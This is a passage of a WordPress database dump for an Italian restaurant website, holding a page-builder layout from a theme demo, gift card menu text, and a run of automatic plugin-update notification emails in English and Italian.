link=\"https://attika.qodeinteractive.com/fine-dinning-concept/\" margin=\"30px 10% 0 0%\"][vc_empty_space height=\"124px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" enable_parallax=\"yes\" parallax_offset=\"30\" parallax_smoothness=\"40\" image=\"206\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769683015{margin-top: -374px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"202px 0% 0px 27%\" item_padding_681_768=\"85% 20% 0% 0%\" item_padding_1025_1366=\"219px 0% 0px 25%\" item_padding_769_1024=\"185px 0% 0px 7%\" item_padding_680=\"202px 0% 0px 0%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_smoothness=\"40\" image=\"205\" image_size=\"full\"][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Haute Cuisine\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat.[/mkdf_section_title][vc_empty_space height=\"30px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"https://attika.qodeinteractive.com/fine-dinning-concept/\" margin=\"30px 0% 0 56%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1536913540691{padding-top: 130px !important;}\"][vc_column][mkdf_checker_box_circle_info icon_pack=\"linea_icons\" linea_icon=\"icon-basic-clock\" button_target=\"_self\" button_text=\"book a table\" left_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum ligula, fringilla egestas dolor lobortis vel. Praesent eget.\" left_content_background_color=\"#f8f2ed\" right_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum.\" right_content_background_color=\"#fef8f7\" title_top=\"Lunch:\" text_top=\"Tuesday to Saturday\n12pm - 2:30pm (last order)\" title_bottom=\"Dinner:\" text_bottom=\"Tuesday to Saturday\n6pm - 10:30pm (last order)\" button_link=\"https://www.opentable.com/r/ikoyi-reservations-london?restref=161697&amp;datetime=2018-08-28T19%3A00&amp;covers=1&amp;searchdatetime=2018-08-28T19%3A00&amp;partysize=1\" left_content_padding=\"123px 26% 118px 14%\" right_content_padding=\"123px 18% 118px 25%\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534769891217{margin-left: -50px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 35px 33%\" item_padding_1367_1600=\"0 0 35px 36%\" item_padding_1025_1366=\"0 0 35px 36%\" item_padding_769_1024=\"64px 0 87px 40%\" item_padding_681_768=\"63px 0 0px 18%\" item_padding_680=\"43px 0% 117px 22%\"][vc_column_text]\n<h3>Attika\nFine\nDining\nRestaurant</h3>\n[/vc_column_text][vc_empty_space height=\"10px\"][vc_column_text]<a href=\"https://www.google.com/maps/place/35+Rainbow+Ridge+Dr,+Livingston,+NJ+07039,+USA/@40.8114217,-74.3334163,15.04z/data=!4m5!3m4!1s0x89c3a997640392e1:0xe5e9cdfe2711609c!8m2!3d40.8140015!4d-74.3310237\" target=\"_blank\" rel=\"noopener noreferrer\">Rainbow Ridge Dr street 35</a>\n<a href=\"https://www.google.com/maps/place/New+York,+NY,+USA/@40.6976637,-74.119763,11z/data=!3m1!4b1!4m5!3m4!1s0x89c24fa5d33f083b:0xc80b8f06e177fe62!8m2!3d40.7127753!4d-74.0059728\" target=\"_blank\" rel=\"noopener noreferrer\">NY City, NY</a>[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769906135{margin-top: -62px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"12px 0 0 33%\" item_padding_769_1024=\"162px 0 0 15%\" item_padding_681_768=\"20% 0% 99px 49%\" item_padding_680=\"12px 12% 79px 12%\" item_padding_1025_1366=\"12px 0 0 30%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_offset=\"20\" parallax_smoothness=\"30\" image=\"250\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"618 St Johns Pl, Brooklyn, NY 11238, USA\" pin=\"257\" map_height=\"345px\" snazzy_map_code=\"`{`\n{\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#f5f5f5``\n}\n`}`\n},\n{\n``elementType``: ``labels.icon``,\n``stylers``: `{`\n{\n``visibility``: ``off``\n}\n`}`\n},\n{\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#616161``\n}\n`}`\n},\n{\n``elementType``: ``labels.text.stroke``,\n``stylers``: `{`\n{\n``color``: ``#f5f5f5``\n}\n`}`\n},\n{\n``featureType``: ``administrative.land_parcel``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#bdbdbd``\n}\n`}`\n},\n{\n``featureType``: ``poi``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#eeeeee``\n}\n`}`\n},\n{\n``featureType``: ``poi``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#757575``\n}\n`}`\n},\n{\n``featureType``: ``poi.park``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#e5e5e5``\n}\n`}`\n},\n{\n``featureType``: ``poi.park``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n},\n{\n``featureType``: ``road``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#ffffff``\n}\n`}`\n},\n{\n``featureType``: ``road.arterial``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#757575``\n}\n`}`\n},\n{\n``featureType``: ``road.highway``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#dadada``\n}\n`}`\n},\n{\n``featureType``: ``road.highway``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#616161``\n}\n`}`\n},\n{\n``featureType``: ``road.local``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n},\n{\n``featureType``: ``transit.line``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#e5e5e5``\n}\n`}`\n},\n{\n``featureType``: ``transit.station``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#eeeeee``\n}\n`}`\n},\n{\n``featureType``: ``water``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#c9c9c9``\n}\n`}`\n},\n{\n``featureType``: ``water``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n}\n`}`\" zoom=\"18\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533133353763{padding-top: 100px !important;}\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"269\" image_size=\"full\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}\" el_class=\"mkdf-reveal-from-right\"][vc_column width=\"1/5\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Generic inquiries\" content_padding=\"124px 0\" email=\"attika@qode.com\" link=\"mailto:attika@qode.com\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Press\" content_padding=\"124px 0\" email=\"attika@qode.com\" link=\"mailto:attika@qode.com\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Job Inquiries\" content_padding=\"124px 0\" email=\"attika@qode.com\" link=\"mailto:attika@qode.com\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Events\" content_padding=\"124px 0\" email=\"attika@qode.com\" link=\"mailto:attika@qode.com\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534502044211{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"60px 2% 50px 24%\" item_padding_769_1024=\"12px 0% 57px 2%\" item_padding_681_768=\"20px 0% 70px 0%\" item_padding_680=\"0px 0% 70px 0%\" item_padding_1367_1600=\"60px 1% 50px 24%\" item_padding_1025_1366=\"60px 1% 50px 24%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" line_length=\"120px\" title=\"Read Our Blog\" title_break_words=\"1,2\" line_margin=\"30px 45px\" text_margin=\"100px\" text_right_padding=\"0\" holder_padding=\"0\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula.[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_blog_list type=\"standard\" space_between_items=\"small\" orderby=\"date\" order=\"ASC\" image_size=\"full\" number_of_posts=\"4\" category=\"healthy\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533132683543{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][mkdf_testimonials skin=\"\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"outer\" slider_pagination=\"no\" number=\"6\" category=\"testimonials-1\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"324\" image_size=\"full\"][/vc_column][/vc_row]','Demo Main','','inherit','closed','closed','','4598-autosave-v1','','','2021-01-26 09:18:46','2021-01-26 08:18:46','',4598,'https://www.ristorantesolymar.it/2021/01/26/4598-autosave-v1/',0,'revision','',0),(4603,0,'2021-01-26 13:25:45','2021-01-26 12:25:45','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Popup Builder (from version 3.72 to 3.73)\n- Really Simple SSL (from version 4.0.6 to 4.0.7)\n- Yoast SEO (from version 15.6.2 to 15.7)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-38','','','2021-01-26 13:25:45','2021-01-26 12:25:45','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-38/',0,'postman_sent_mail','',0),(4602,71,'2021-01-26 09:21:39','2021-01-26 08:21:39','{{unknown}}','','','publish','closed','closed','','facd29b490a85a12d0d2db4afab2d559','','','2021-01-26 09:21:39','2021-01-26 08:21:39','',0,'https://www.ristorantesolymar.it/2021/01/26/facd29b490a85a12d0d2db4afab2d559/',0,'oembed_cache','',0),(4617,0,'2021-02-08 15:40:06','2021-02-08 14:40:06','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Really Simple SSL (da versione 4.0.7 a 4.0.8)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-4','','','2021-02-08 15:40:06','2021-02-08 14:40:06','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-4/',0,'postman_sent_mail','',0),(4605,0,'2021-01-29 01:27:04','2021-01-29 00:27:04','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Post SMTP (from version 2.0.19 to 2.0.20)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-39','','','2021-01-29 01:27:04','2021-01-29 00:27:04','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-39/',0,'postman_sent_mail','',0),(4606,0,'2021-01-29 13:23:18','2021-01-29 12:23:18','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Child Theme Configurator (from version 2.5.6 to 2.5.7)\n- UpdraftPlus - Backup/Restore (from version 1.16.46 to 1.16.47)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-40','','','2021-01-29 13:23:18','2021-01-29 12:23:18','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-40/',0,'postman_sent_mail','',0),(4607,1,'2021-01-29 13:52:37','2021-01-29 12:52:37','Acquista e regala un coupon regalo da 50 euro','Gift Card 50 euro','<em>Calamari saltati con patate e bacon\nGamberi alla greca\nSpaghetto alle vongole\nFrittura mista e lo spiedone grigliato\nSorbetto\n1 bottiglia di vino \n2 caffè \n1 bottiglia d’acqua\nEuro 115</em>','inherit','closed','closed','','475-autosave-v1','','','2021-01-29 13:52:37','2021-01-29 12:52:37','',475,'https://www.ristorantesolymar.it/2021/01/29/475-autosave-v1/',0,'revision','',0),(4609,0,'2021-01-31 16:22:40','2021-01-31 15:22:40','{{unknown}}','','','publish','closed','closed','','d47958ce6a38c71cc46ab62c68f83f0a','','','2021-01-31 16:22:40','2021-01-31 15:22:40','',0,'https://www.ristorantesolymar.it/vecchio/2021/01/31/d47958ce6a38c71cc46ab62c68f83f0a/',0,'oembed_cache','',0),(4612,0,'2021-02-02 01:59:04','2021-02-02 00:59:04','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Popup Builder (da versione 3.73 a 3.74)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-2','','','2021-02-02 01:59:04','2021-02-02 00:59:04','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-2/',0,'postman_sent_mail','',0),(4611,1,'2021-01-31 16:30:38','2021-01-31 15:30:38','{{unknown}}','','','publish','closed','closed','','3b7eef75aa58f3564f0732449ae4cd02','','','2021-01-31 16:30:38','2021-01-31 15:30:38','',0,'https://www.ristorantesolymar.it/vecchio/2021/01/31/3b7eef75aa58f3564f0732449ae4cd02/',0,'oembed_cache','',0),(4613,0,'2021-02-02 15:16:02','2021-02-02 14:16:02','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (da versione 3.1.3 a 3.1.4)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-3','','','2021-02-02 15:16:02','2021-02-02 14:16:02','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-3/',0,'postman_sent_mail','',0),(4615,0,'2021-02-04 02:02:42','2021-02-04 01:02:42','{{unknown}}','','','publish','closed','closed','','76d34b5eedeeb1f926ffe33948122eab','','','2021-02-04 02:02:42','2021-02-04 01:02:42','',0,'https://www.ristorantesolymar.it/vecchio/2021/02/04/76d34b5eedeeb1f926ffe33948122eab/',0,'oembed_cache','',0),(4616,0,'2021-02-04 02:02:47','2021-02-04 01:02:47','{{unknown}}','','','publish','closed','closed','','de32be3a80dec1a9f887b391b7813942','','','2021-02-04 02:02:47','2021-02-04 01:02:47','',0,'https://www.ristorantesolymar.it/vecchio/2021/02/04/de32be3a80dec1a9f887b391b7813942/',0,'oembed_cache','',0),(4618,0,'2021-02-10 04:08:03','2021-02-10 03:08:03','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- WP Fastest Cache (da versione 0.9.1.4 a 0.9.1.5)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-5','','','2021-02-10 04:08:03','2021-02-10 03:08:03','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-5/',0,'postman_sent_mail','',0),(4619,0,'2021-02-10 14:40:02','2021-02-10 13:40:02','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Yoast SEO (da versione 15.7 a 15.8)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-6','','','2021-02-10 14:40:02','2021-02-10 13:40:02','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-6/',0,'postman_sent_mail','',0),(4620,0,'2021-02-11 15:52:52','2021-02-11 14:52:52','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Popup Builder (da versione 3.74 a 3.76)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-7','','','2021-02-11 15:52:52','2021-02-11 14:52:52','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-7/',0,'postman_sent_mail','',0),(4621,0,'2021-02-12 13:33:03','2021-02-12 12:33:03','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Post SMTP (da versione 2.0.20 a 2.0.21)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-8','','','2021-02-12 13:33:03','2021-02-12 12:33:03','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-8/',0,'postman_sent_mail','',0),(4622,0,'2021-02-17 14:07:31','2021-02-17 13:07:31','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Post SMTP (da versione 2.0.21 a 2.0.22)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-9','','','2021-02-17 14:07:31','2021-02-17 13:07:31','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-9/',0,'postman_sent_mail','',0),(4623,0,'2021-02-19 01:23:39','2021-02-19 00:23:39','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (da versione 3.1.4 a 3.1.5)\n- Smash Balloon Instagram Feed (da versione 2.7 a 2.8)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-10','','','2021-02-19 01:23:39','2021-02-19 00:23:39','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-10/',0,'postman_sent_mail','',0),(4626,0,'2021-02-23 13:40:25','2021-02-23 12:40:25','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Smash Balloon Instagram Feed (da versione 2.8 a 2.8.1)\n- Yoast SEO (da versione 15.8 a 15.9)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-12','','','2021-02-23 13:40:25','2021-02-23 12:40:25','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-12/',0,'postman_sent_mail','',0),(4627,0,'2021-02-24 13:23:55','2021-02-24 12:23:55','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Contact Form 7 (da versione 5.3.2 a 5.4)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-13','','','2021-02-24 13:23:55','2021-02-24 12:23:55','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-13/',0,'postman_sent_mail','',0),(4628,0,'2021-02-28 15:33:13','2021-02-28 14:33:13','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Really Simple CAPTCHA (da versione 2.0.2 a 2.1)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-14','','','2021-02-28 15:33:13','2021-02-28 14:33:13','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-14/',0,'postman_sent_mail','',0),(4629,0,'2021-03-03 02:08:37','2021-03-03 01:08:37','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Akismet Anti-Spam (da versione 4.1.8 a 4.1.9)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-15','','','2021-03-03 02:08:37','2021-03-03 01:08:37','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-15/',0,'postman_sent_mail','',0),(4630,0,'2021-03-04 06:52:43','2021-03-04 05:52:43','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Smash Balloon Instagram Feed (da versione 2.8.1 a 2.8.2)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-16','','','2021-03-04 06:52:43','2021-03-04 